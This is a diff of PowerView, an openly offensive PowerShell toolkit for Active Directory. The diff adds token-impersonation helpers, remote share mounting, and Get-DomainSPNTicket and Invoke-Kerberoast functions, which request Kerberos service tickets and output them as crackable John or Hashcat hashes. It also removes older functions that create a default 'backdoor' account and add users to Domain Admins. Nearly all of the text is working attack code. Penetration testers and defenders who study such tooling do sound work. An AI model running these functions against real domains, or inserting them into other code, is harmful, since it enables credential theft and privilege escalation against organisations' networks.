$Credential = [Management.Automation.PSCredential]::Empty ) - $ForestObject = Get-NetForest -Forest $Forest -Credential $Credential + Add-Type -AssemblyName System.DirectoryServices.AccountManagement + + try { + if ($PSBoundParameters['Domain'] -or ($Identity -match '.+\\.+')) { + if ($Identity -match '.+\\.+') { + # DOMAIN\groupname + $ConvertedIdentity = $Identity | Convert-ADName -OutputType Canonical + if ($ConvertedIdentity) { + $ConnectTarget = $ConvertedIdentity.SubString(0, $ConvertedIdentity.IndexOf('/')) + $ObjectIdentity = $Identity.Split('\')[1] + Write-Verbose "[Get-PrincipalContext] Binding to domain '$ConnectTarget'" + } + } + else { + $ObjectIdentity = $Identity + Write-Verbose "[Get-PrincipalContext] Binding to domain '$Domain'" + $ConnectTarget = $Domain + } + + if ($PSBoundParameters['Credential']) { + Write-Verbose '[Get-PrincipalContext] Using alternate credentials' + $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $ConnectTarget, $Credential.UserName, $Credential.GetNetworkCredential().Password) + } + else { + $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $ConnectTarget) + } + } + else { + if ($PSBoundParameters['Credential']) { + Write-Verbose '[Get-PrincipalContext] Using alternate credentials' + $DomainName = Get-Domain | Select-Object -ExpandProperty Name + $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $DomainName, $Credential.UserName, $Credential.GetNetworkCredential().Password) + } + else { + $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain) + } + $ObjectIdentity = $Identity + } - if($ForestObject) { - $ForestObject.FindAllGlobalCatalogs() + $Out = New-Object PSObject + $Out | Add-Member Noteproperty 'Context' $Context + $Out | Add-Member Noteproperty 'Identity' $ObjectIdentity + $Out + } + catch { + Write-Warning "[Get-PrincipalContext] Error creating binding for object ('$Identity') context : $_" } } -filter Get-NetDomainController { +function Add-RemoteConnection { <# - .SYNOPSIS +.SYNOPSIS - Return the current domain controllers for the active domain. +Pseudo "mounts" a connection to a remote path using the specified +credential object, allowing for access of remote resources. If a -Path isn't +specified, a -ComputerName is required to pseudo-mount IPC$. - .PARAMETER Domain +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect - The domain to query for domain controllers, defaults to the current domain. +.DESCRIPTION - .PARAMETER DomainController +This function uses WNetAddConnection2W to make a 'temporary' (i.e. not saved) connection +to the specified remote -Path (\\UNC\share) with the alternate credentials specified in the +-Credential object. If a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC$. - Domain controller to reflect LDAP queries through. +To destroy the connection, use Remove-RemoteConnection with the same specified \\UNC\share path +or -ComputerName. - .PARAMETER LDAP +.PARAMETER ComputerName - Switch. Use LDAP queries to determine the domain controllers. +Specifies the system to add a \\ComputerName\IPC$ connection for. - .PARAMETER Credential +.PARAMETER Path - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +Specifies the remote \\UNC\path to add the connection for. - .EXAMPLE +.PARAMETER Credential - PS C:\> Get-NetDomainController -Domain 'test.local' - - Determine the domain controllers for 'test.local'. +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system. - .EXAMPLE +.EXAMPLE - PS C:\> Get-NetDomainController -Domain 'test.local' -LDAP +$Cred = Get-Credential +Add-RemoteConnection -ComputerName 'PRIMARY.testlab.local' -Credential $Cred - Determine the domain controllers for 'test.local' using LDAP queries. +.EXAMPLE - .EXAMPLE +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Add-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\' -Credential $Cred - PS C:\> 'test.local' | Get-NetDomainController +.EXAMPLE - Determine the domain controllers for 'test.local'. +$Cred = Get-Credential +@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Add-RemoteConnection -Credential $Cred #> - [CmdletBinding()] - param( - [Parameter(ValueFromPipeline=$True)] - [String] - $Domain, - - [String] - $DomainController, + [CmdletBinding(DefaultParameterSetName = 'ComputerName')] + Param( + [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ComputerName', ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName, - [Switch] - $LDAP, + [Parameter(Position = 0, ParameterSetName = 'Path', Mandatory = $True)] + [ValidatePattern('\\\\.*\\.*')] + [String[]] + $Path, + [Parameter(Mandatory = $True)] [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] $Credential ) - if($LDAP -or $DomainController) { - # filter string to return all domain controllers - Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -Filter '(userAccountControl:1.2.840.113556.1.4.803:=8192)' + BEGIN { + $NetResourceInstance = [Activator]::CreateInstance($NETRESOURCEW) + $NetResourceInstance.dwType = 1 } - else { - $FoundDomain = Get-NetDomain -Domain $Domain -Credential $Credential - if($FoundDomain) { - $Founddomain.DomainControllers + + PROCESS { + $Paths = @() + if ($PSBoundParameters['ComputerName']) { + ForEach ($TargetComputerName in $ComputerName) { + $TargetComputerName = $TargetComputerName.Trim('\') + $Paths += ,"\\$TargetComputerName\IPC$" + } + } + else { + $Paths += ,$Path + } + + ForEach ($TargetPath in $Paths) { + $NetResourceInstance.lpRemoteName = $TargetPath + Write-Verbose "[Add-RemoteConnection] Attempting to mount: $TargetPath" + + # https://msdn.microsoft.com/en-us/library/windows/desktop/aa385413(v=vs.85).aspx + # CONNECT_TEMPORARY = 4 + $Result = $Mpr::WNetAddConnection2W($NetResourceInstance, $Credential.GetNetworkCredential().Password, $Credential.UserName, 4) + + if ($Result -eq 0) { + Write-Verbose "$TargetPath successfully mounted" + } + else { + Throw "[Add-RemoteConnection] error mounting $TargetPath : $(([ComponentModel.Win32Exception]$Result).Message)" + } } } } -######################################################## -# -# "net *" replacements and other fun start below -# -######################################################## - -function Get-NetUser { +function Remove-RemoteConnection { <# - .SYNOPSIS +.SYNOPSIS - Query information for a given user or users in the domain - using ADSI and LDAP. Another -Domain can be specified to - query for users across a trust. - Replacement for "net users /domain" +Destroys a connection created by New-RemoteConnection. - .PARAMETER UserName +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect - Username filter string, wildcards accepted. +.DESCRIPTION - .PARAMETER Domain +This function uses WNetCancelConnection2 to destroy a connection created by +New-RemoteConnection. If a -Path isn't specified, a -ComputerName is required to +'unmount' \\$ComputerName\IPC$. - The domain to query for users, defaults to the current domain. +.PARAMETER ComputerName - .PARAMETER DomainController +Specifies the system to remove a \\ComputerName\IPC$ connection for. - Domain controller to reflect LDAP queries through. +.PARAMETER Path - .PARAMETER ADSpath +Specifies the remote \\UNC\path to remove the connection for. - The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +.EXAMPLE - .PARAMETER Filter +Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local' - A customized ldap filter string to use, e.g. "(description=*admin*)" +.EXAMPLE - .PARAMETER AdminCount +Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\' - Switch. Return users with adminCount=1. +.EXAMPLE - .PARAMETER SPN - - Switch. Only return user objects with non-null service principal names. +@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection +#> - .PARAMETER Unconstrained + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [CmdletBinding(DefaultParameterSetName = 'ComputerName')] + Param( + [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ComputerName', ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName, - Switch. Return users that have unconstrained delegation. + [Parameter(Position = 0, ParameterSetName = 'Path', Mandatory = $True)] + [ValidatePattern('\\\\.*\\.*')] + [String[]] + $Path + ) - .PARAMETER AllowDelegation + PROCESS { + $Paths = @() + if ($PSBoundParameters['ComputerName']) { + ForEach ($TargetComputerName in $ComputerName) { + $TargetComputerName = $TargetComputerName.Trim('\') + $Paths += ,"\\$TargetComputerName\IPC$" + } + } + else { + $Paths += ,$Path + } - Switch. Return user accounts that are not marked as 'sensitive and not allowed for delegation' + ForEach ($TargetPath in $Paths) { + Write-Verbose "[Remove-RemoteConnection] Attempting to unmount: $TargetPath" + $Result = $Mpr::WNetCancelConnection2($TargetPath, 0, $True) - .PARAMETER PageSize + if ($Result -eq 0) { + Write-Verbose "$TargetPath successfully ummounted" + } + else { + Throw "[Remove-RemoteConnection] error unmounting $TargetPath : $(([ComponentModel.Win32Exception]$Result).Message)" + } + } + } +} - The PageSize to set for the LDAP searcher object. - .PARAMETER Credential +function Invoke-UserImpersonation { +<# +.SYNOPSIS - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +Creates a new "runas /netonly" type logon and impersonates the token. - .EXAMPLE +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect - PS C:\> Get-NetUser -Domain testing +.DESCRIPTION - .EXAMPLE +This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType +to simulate "runas /netonly". The resulting token is then impersonated with +ImpersonateLoggedOnUser() and the token handle is returned for later usage +with Invoke-RevertToSelf. - PS C:\> Get-NetUser -ADSpath "LDAP://OU=secret,DC=testlab,DC=local" -#> +.PARAMETER Credential - param( - [Parameter(Position=0, ValueFromPipeline=$True)] - [String] - $UserName, +A [Management.Automation.PSCredential] object with alternate credentials +to impersonate in the current thread space. - [String] - $Domain, +.PARAMETER TokenHandle - [String] - $DomainController, +An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation. +If this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser() +is executed. - [String] - $ADSpath, +.PARAMETER Quiet - [String] - $Filter, +Suppress any warnings about STA vs MTA. - [Switch] - $SPN, +.EXAMPLE - [Switch] - $AdminCount, +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Invoke-UserImpersonation -Credential $Cred - [Switch] - $Unconstrained, +.OUTPUTS - [Switch] - $AllowDelegation, +IntPtr - [ValidateRange(1,10000)] - [Int] - $PageSize = 200, +The TokenHandle result from LogonUser. +#> + [OutputType([IntPtr])] + [CmdletBinding(DefaultParameterSetName = 'Credential')] + Param( + [Parameter(Mandatory = $True, ParameterSetName = 'Credential')] [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential, + + [Parameter(Mandatory = $True, ParameterSetName = 'TokenHandle')] + [ValidateNotNull()] + [IntPtr] + $TokenHandle, + + [Switch] + $Quiet ) - begin { - # so this isn't repeated if users are passed on the pipeline - $UserSearcher = Get-DomainSearcher -Domain $Domain -ADSpath $ADSpath -DomainController $DomainController -PageSize $PageSize -Credential $Credential + if (([System.Threading.Thread]::CurrentThread.GetApartmentState() -ne 'STA') -and (-not $PSBoundParameters['Quiet'])) { + Write-Warning "[Invoke-UserImpersonation] powershell.exe is not currently in a single-threaded apartment state, token impersonation may not work." } - process { - if($UserSearcher) { - - # if we're checking for unconstrained delegation - if($Unconstrained) { - Write-Verbose "Checking for unconstrained delegation" - $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=524288)" - } - if($AllowDelegation) { - Write-Verbose "Checking for users who can be delegated" - # negation of "Accounts that are sensitive and not trusted for delegation" - $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=1048574))" - } - if($AdminCount) { - Write-Verbose "Checking for adminCount=1" - $Filter += "(admincount=1)" - } + if ($PSBoundParameters['TokenHandle']) { + $LogonTokenHandle = $TokenHandle + } + else { + $LogonTokenHandle = [IntPtr]::Zero + $NetworkCredential = $Credential.GetNetworkCredential() + $UserDomain = $NetworkCredential.Domain + $UserName = $NetworkCredential.UserName + Write-Warning "[Invoke-UserImpersonation] Executing LogonUser() with user: $($UserDomain)\$($UserName)" - # check if we're using a username filter or not - if($UserName) { - # samAccountType=805306368 indicates user objects - $UserSearcher.filter="(&(samAccountType=805306368)(samAccountName=$UserName)$Filter)" - } - elseif($SPN) { - $UserSearcher.filter="(&(samAccountType=805306368)(servicePrincipalName=*)$Filter)" - } - else { - # filter is something like "(samAccountName=*blah*)" if specified - $UserSearcher.filter="(&(samAccountType=805306368)$Filter)" - } + # LOGON32_LOGON_NEW_CREDENTIALS = 9, LOGON32_PROVIDER_WINNT50 = 3 + # this is to simulate "runas.exe /netonly" functionality + $Result = $Advapi32::LogonUser($UserName, $UserDomain, $NetworkCredential.Password, 9, 3, [ref]$LogonTokenHandle);$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error(); - $Results = $UserSearcher.FindAll() - $Results | Where-Object {$_} | ForEach-Object { - # convert/process the LDAP fields for each result - $User = Convert-LDAPProperty -Properties $_.Properties - $User.PSObject.TypeNames.Add('PowerView.User') - $User - } - $Results.dispose() - $UserSearcher.dispose() + if (-not $Result) { + throw "[Invoke-UserImpersonation] LogonUser() Error: $(([ComponentModel.Win32Exception] $LastError).Message)" } } -} - - -function Add-NetUser { -<# - .SYNOPSIS - - Adds a domain user or a local user to the current (or remote) machine, - if permissions allow, utilizing the WinNT service provider and - DirectoryServices.AccountManagement, respectively. - - The default behavior is to add a user to the local machine. - An optional group name to add the user to can be specified. - .PARAMETER UserName + # actually impersonate the token from LogonUser() + $Result = $Advapi32::ImpersonateLoggedOnUser($LogonTokenHandle) - The username to add. If not given, it defaults to 'backdoor' - - .PARAMETER Password + if (-not $Result) { + throw "[Invoke-UserImpersonation] ImpersonateLoggedOnUser() Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + } - The password to set for the added user. If not given, it defaults to 'Password123!' + Write-Verbose "[Invoke-UserImpersonation] Alternate credentials successfully impersonated" + $LogonTokenHandle +} - .PARAMETER GroupName - Group to optionally add the user to. +function Invoke-RevertToSelf { +<# +.SYNOPSIS - .PARAMETER ComputerName +Reverts any token impersonation. - Hostname to add the local user to, defaults to 'localhost' +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect - .PARAMETER Domain +.DESCRIPTION - Specified domain to add the user to. +This function uses RevertToSelf() to revert any impersonated tokens. +If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation), +CloseHandle() is used to close the opened handle. - .EXAMPLE +.PARAMETER TokenHandle - PS C:\> Add-NetUser -UserName john -Password 'Password123!' - - Adds a localuser 'john' to the local machine with password of 'Password123!' +An optional IntPtr TokenHandle returned by Invoke-UserImpersonation. - .EXAMPLE +.EXAMPLE - PS C:\> Add-NetUser -UserName john -Password 'Password123!' -ComputerName server.testlab.local - - Adds a localuser 'john' with password of 'Password123!' to server.testlab.local's local Administrators group. +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$Token = Invoke-UserImpersonation -Credential $Cred +Invoke-RevertToSelf -TokenHandle $Token +#> - .EXAMPLE + [CmdletBinding()] + Param( + [ValidateNotNull()] + [IntPtr] + $TokenHandle + ) - PS C:\> Add-NetUser -UserName john -Password password -GroupName "Domain Admins" -Domain '' - - Adds the user "john" with password "password" to the current domain and adds - the user to the domain group "Domain Admins" + if ($PSBoundParameters['TokenHandle']) { + Write-Warning "[Invoke-RevertToSelf] Reverting token impersonation and closing LogonUser() token handle" + $Result = $Kernel32::CloseHandle($TokenHandle) + } - .EXAMPLE + $Result = $Advapi32::RevertToSelf();$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error(); - PS C:\> Add-NetUser -UserName john -Password password -GroupName "Domain Admins" -Domain 'testing' - - Adds the user "john" with password "password" to the 'testing' domain and adds - the user to the domain group "Domain Admins" + if (-not $Result) { + throw "[Invoke-RevertToSelf] RevertToSelf() Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + } - .Link + Write-Verbose "[Invoke-RevertToSelf] Token impersonation successfully reverted" +} - http://blogs.technet.com/b/heyscriptingguy/archive/2010/11/23/use-powershell-to-create-local-user-accounts.aspx -#> - [CmdletBinding()] - Param ( - [ValidateNotNullOrEmpty()] - [String] - $UserName = 'backdoor', +function Get-DomainSPNTicket { +<# +.SYNOPSIS - [ValidateNotNullOrEmpty()] - [String] - $Password = 'Password123!', +Request the kerberos ticket for a specified service principal name (SPN). - [ValidateNotNullOrEmpty()] - [String] - $GroupName, +Author: machosec, Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf - [ValidateNotNullOrEmpty()] - [Alias('HostName')] - [String] - $ComputerName = 'localhost', +.DESCRIPTION - [ValidateNotNullOrEmpty()] - [String] - $Domain - ) +This function will either take one/more SPN strings, or one/more PowerView.User objects +(the output from Get-DomainUser) and will request a kerberos ticket for the given SPN +using System.IdentityModel.Tokens.KerberosRequestorSecurityToken. The encrypted +portion of the ticket is then extracted and output in either crackable John or Hashcat +format (deafult of Hashcat). - if ($Domain) { +.PARAMETER SPN - $DomainObject = Get-NetDomain -Domain $Domain - if(-not $DomainObject) { - Write-Warning "Error in grabbing $Domain object" - return $Null - } +Specifies the service principal name to request the ticket for. - # add the assembly we need - Add-Type -AssemblyName System.DirectoryServices.AccountManagement +.PARAMETER User - # http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/ - # get the domain context - $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain), $DomainObject +Specifies a PowerView.User object (result of Get-DomainUser) to request the ticket for. - # create the user object - $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList $Context +.PARAMETER OutputFormat - # set user properties - $User.Name = $UserName - $User.SamAccountName = $UserName - $User.PasswordNotRequired = $False - $User.SetPassword($Password) - $User.Enabled = $True +Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format. +Defaults to 'John'. - Write-Verbose "Creating user $UserName to with password '$Password' in domain $Domain" +.PARAMETER Credential - try { - # commit the user - $User.Save() - "[*] User $UserName successfully created in domain $Domain" - } - catch { - Write-Warning '[!] User already exists!' - return - } - } - else { - - Write-Verbose "Creating user $UserName to with password '$Password' on $ComputerName" +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote domain using Invoke-UserImpersonation. - # if it's not a domain add, it's a local machine add - $ObjOu = [ADSI]"WinNT://$ComputerName" - $ObjUser = $ObjOu.Create('User', $UserName) - $ObjUser.SetPassword($Password) +.EXAMPLE - # commit the changes to the local machine - try { - $Null = $ObjUser.SetInfo() - "[*] User $UserName successfully created on host $ComputerName" - } - catch { - Write-Warning '[!] Account already exists!' - return - } - } +Get-DomainSPNTicket -SPN "HTTP/web.testlab.local" - # if a group is specified, invoke Add-NetGroupUser and return its value - if ($GroupName) { - # if we're adding the user to a domain - if ($Domain) { - Add-NetGroupUser -UserName $UserName -GroupName $GroupName -Domain $Domain - "[*] User $UserName successfully added to group $GroupName in domain $Domain" - } - # otherwise, we're adding to a local group - else { - Add-NetGroupUser -UserName $UserName -GroupName $GroupName -ComputerName $ComputerName - "[*] User $UserName successfully added to group $GroupName on host $ComputerName" - } - } -} +Request a kerberos service ticket for the specified SPN. +.EXAMPLE -function Add-NetGroupUser { -<# - .SYNOPSIS +"HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-DomainSPNTicket - Adds a user to a domain group or a local group on the current (or remote) machine, - if permissions allow, utilizing the WinNT service provider and - DirectoryServices.AccountManagement, respectively. +Request kerberos service tickets for all SPNs passed on the pipeline. - .PARAMETER UserName +.EXAMPLE - The domain username to query for. +Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat JTR - .PARAMETER GroupName +Request kerberos service tickets for all users with non-null SPNs and output in JTR format. - Group to add the user to. +.INPUTS - .PARAMETER ComputerName +String - Hostname to add the user to, defaults to localhost. +Accepts one or more SPN strings on the pipeline with the RawSPN parameter set. - .PARAMETER Domain +.INPUTS - Domain to add the user to. +PowerView.User - .EXAMPLE +Accepts one or more PowerView.User objects on the pipeline with the User parameter set. - PS C:\> Add-NetGroupUser -UserName john -GroupName Administrators - - Adds a localuser "john" to the local group "Administrators" +.OUTPUTS - .EXAMPLE +PowerView.SPNTicket - PS C:\> Add-NetGroupUser -UserName john -GroupName "Domain Admins" -Domain dev.local - - Adds the existing user "john" to the domain group "Domain Admins" in "dev.local" +Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section. #> - [CmdletBinding()] - param( - [Parameter(Mandatory = $True)] - [ValidateNotNullOrEmpty()] - [String] - $UserName, + [OutputType('PowerView.SPNTicket')] + [CmdletBinding(DefaultParameterSetName = 'RawSPN')] + Param ( + [Parameter(Position = 0, ParameterSetName = 'RawSPN', Mandatory = $True, ValueFromPipeline = $True)] + [ValidatePattern('.*/.*')] + [Alias('ServicePrincipalName')] + [String[]] + $SPN, - [Parameter(Mandatory = $True)] - [ValidateNotNullOrEmpty()] - [String] - $GroupName, + [Parameter(Position = 0, ParameterSetName = 'User', Mandatory = $True, ValueFromPipeline = $True)] + [ValidateScript({ $_.PSObject.TypeNames[0] -eq 'PowerView.User' })] + [Object[]] + $User, - [ValidateNotNullOrEmpty()] - [Alias('HostName')] + [ValidateSet('John', 'Hashcat')] + [Alias('Format')] [String] - $ComputerName, + $OutputFormat = 'Hashcat', - [String] - $Domain + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - # add the assembly if we need it - Add-Type -AssemblyName System.DirectoryServices.AccountManagement + BEGIN { + $Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') - # if we're adding to a remote host's local group, use the WinNT provider - if($ComputerName -and ($ComputerName -ne "localhost")) { - try { - Write-Verbose "Adding user $UserName to $GroupName on host $ComputerName" - ([ADSI]"WinNT://$ComputerName/$GroupName,group").add("WinNT://$ComputerName/$UserName,user") - "[*] User $UserName successfully added to group $GroupName on $ComputerName" - } - catch { - Write-Warning "[!] Error adding user $UserName to group $GroupName on $ComputerName" - return + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential } } - # otherwise it's a local machine or domain add - else { - try { - if ($Domain) { - Write-Verbose "Adding user $UserName to $GroupName on domain $Domain" - $CT = [System.DirectoryServices.AccountManagement.ContextType]::Domain - $DomainObject = Get-NetDomain -Domain $Domain - if(-not $DomainObject) { - return $Null - } - # get the full principal context - $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList $CT, $DomainObject + PROCESS { + if ($PSBoundParameters['User']) { + $TargetObject = $User + } + else { + $TargetObject = $SPN + } + + ForEach ($Object in $TargetObject) { + if ($PSBoundParameters['User']) { + $UserSPN = $Object.ServicePrincipalName + $SamAccountName = $Object.SamAccountName + $DistinguishedName = $Object.DistinguishedName } else { - # otherwise, get the local machine context - Write-Verbose "Adding user $UserName to $GroupName on localhost" - $Context = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine, $Env:ComputerName) + $UserSPN = $Object + $SamAccountName = 'UNKNOWN' + $DistinguishedName = 'UNKNOWN' + } + + # if a user has multiple SPNs we only take the first one otherwise the service ticket request fails miserably :) -@st3r30byt3 + if ($UserSPN -is [System.DirectoryServices.ResultPropertyValueCollection]) { + $UserSPN = $UserSPN[0] + } + + try { + $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN + } + catch { + Write-Warning "[Get-DomainSPNTicket] Error requesting ticket for SPN '$UserSPN' from user '$DistinguishedName' : $_" + } + if ($Ticket) { + $TicketByteStream = $Ticket.GetRequest() } + if ($TicketByteStream) { + $Out = New-Object PSObject - # find the particular group - $Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($Context,$GroupName) + $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace '-' + + $Out | Add-Member Noteproperty 'SamAccountName' $SamAccountName + $Out | Add-Member Noteproperty 'DistinguishedName' $DistinguishedName + $Out | Add-Member Noteproperty 'ServicePrincipalName' $Ticket.ServicePrincipalName + + # TicketHexStream == GSS-API Frame (see https://tools.ietf.org/html/rfc4121#section-4.1) + # No easy way to parse ASN1, so we'll try some janky regex to parse the embedded KRB_AP_REQ.Ticket object + if($TicketHexStream -match 'a382....3082....A0030201(?..)A1.{1,4}.......A282(?....)........(?.+)') { + $Etype = [Convert]::ToByte( $Matches.EtypeLen, 16 ) + $CipherTextLen = [Convert]::ToUInt32($Matches.CipherTextLen, 16)-4 + $CipherText = $Matches.DataToEnd.Substring(0,$CipherTextLen*2) + + # Make sure the next field matches the beginning of the KRB_AP_REQ.Authenticator object + if($Matches.DataToEnd.Substring($CipherTextLen*2, 4) -ne 'A482') { + Write-Warning "Error parsing ciphertext for the SPN $($Ticket.ServicePrincipalName). Use the TicketByteHexStream field and extract the hash offline with Get-KerberoastHashFromAPReq" + $Hash = $null + $Out | Add-Member Noteproperty 'TicketByteHexStream' ([Bitconverter]::ToString($TicketByteStream).Replace('-','')) + } else { + $Hash = "$($CipherText.Substring(0,32))`$$($CipherText.Substring(32))" + $Out | Add-Member Noteproperty 'TicketByteHexStream' $null + } + } else { + Write-Warning "Unable to parse ticket structure for the SPN $($Ticket.ServicePrincipalName). Use the TicketByteHexStream field and extract the hash offline with Get-KerberoastHashFromAPReq" + $Hash = $null + $Out | Add-Member Noteproperty 'TicketByteHexStream' ([Bitconverter]::ToString($TicketByteStream).Replace('-','')) + } + + if($Hash) { + # JTR jumbo output format - $krb5tgs$SPN/machine.testlab.local:63386d22d359fe... + if ($OutputFormat -match 'John') { + $HashFormat = "`$krb5tgs`$$($Ticket.ServicePrincipalName):$Hash" + } + else { + if ($DistinguishedName -ne 'UNKNOWN') { + $UserDomain = $DistinguishedName.SubString($DistinguishedName.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + } + else { + $UserDomain = 'UNKNOWN' + } - # add the particular user to the group - $Group.Members.add($Context, [System.DirectoryServices.AccountManagement.IdentityType]::SamAccountName, $UserName) + # hashcat output format - $krb5tgs$23$*user$realm$test/spn*$63386d22d359fe... + $HashFormat = "`$krb5tgs`$$($Etype)`$*$SamAccountName`$$UserDomain`$$($Ticket.ServicePrincipalName)*`$$Hash" + } + $Out | Add-Member Noteproperty 'Hash' $HashFormat + } - # commit the changes - $Group.Save() + $Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket') + $Out + } } - catch { - Write-Warning "Error adding $UserName to $GroupName : $_" + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken } } } -function Get-UserProperty { +function Invoke-Kerberoast { <# - .SYNOPSIS - - Returns a list of all user object properties. If a property - name is specified, it returns all [user:property] values. +.SYNOPSIS - Taken directly from @obscuresec's post: - http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html +Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes. - .PARAMETER Properties +Author: Will Schroeder (@harmj0y), @machosec +License: BSD 3-Clause +Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, Get-DomainUser, Get-DomainSPNTicket - Property names to extract for users. +.DESCRIPTION - .PARAMETER Domain +Uses Get-DomainUser to query for user accounts with non-null service principle +names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information. +The ticket format can be specified with -OutputFormat . - The domain to query for user properties, defaults to the current domain. +.PARAMETER Identity - .PARAMETER DomainController +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. - Domain controller to reflect LDAP queries through. +.PARAMETER Domain - .PARAMETER PageSize +Specifies the domain to use for the query, defaults to the current domain. - The PageSize to set for the LDAP searcher object. +.PARAMETER LDAPFilter - .PARAMETER Credential +Specifies an LDAP query string that is used to filter Active Directory objects. - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +.PARAMETER SearchBase - .EXAMPLE +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. - PS C:\> Get-UserProperty -Domain testing - - Returns all user properties for users in the 'testing' domain. - - .EXAMPLE - - PS C:\> Get-UserProperty -Properties ssn,lastlogon,location - - Returns all an array of user/ssn/lastlogin/location combinations - for users in the current domain. - - .LINK - - http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html -#> - - [CmdletBinding()] - param( - [String[]] - $Properties, +.PARAMETER Server - [String] - $Domain, - - [String] - $DomainController, +Specifies an Active Directory server (domain controller) to bind to. - [ValidateRange(1,10000)] - [Int] - $PageSize = 200, +.PARAMETER SearchScope - [Management.Automation.PSCredential] - $Credential - ) +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). - if($Properties) { - # extract out the set of all properties for each object - $Properties = ,"name" + $Properties - Get-NetUser -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential | Select-Object -Property $Properties - } - else { - # extract out just the property names - Get-NetUser -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential | Select-Object -First 1 | 